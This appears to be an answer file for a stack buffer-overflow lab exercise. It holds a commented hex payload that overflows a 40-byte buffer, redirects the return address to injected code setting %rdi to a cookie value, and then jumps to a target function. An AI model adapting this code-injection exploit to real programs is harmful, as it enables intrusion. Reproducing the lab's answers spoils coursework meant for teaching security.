30 30 30 30 30 30 30 30 30 30 /* fill a buffer of size 40 bytes */
30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
30 30 30 30 30 30 30 30 30 30
a8 dc 61 55 00 00 00 00 /* new ret address pointing to the attack code */
48 c7 c7 fa 97 b9 59 48 /* 0x5561dca8: 48 c7 c7 fa 97 b9 59  mov  $0x59b997fa,%rdi */
83 c4 10 c3 00 00 00 00 /* 0x5561dcaf: 48 83 c4 10           add  $0x10,%rsp       */
                        /* 0x5561dcb3: c3                    retq                  */
ec 17 40 00 00 00 00 00 /* another new ret address pointing to touch2 */

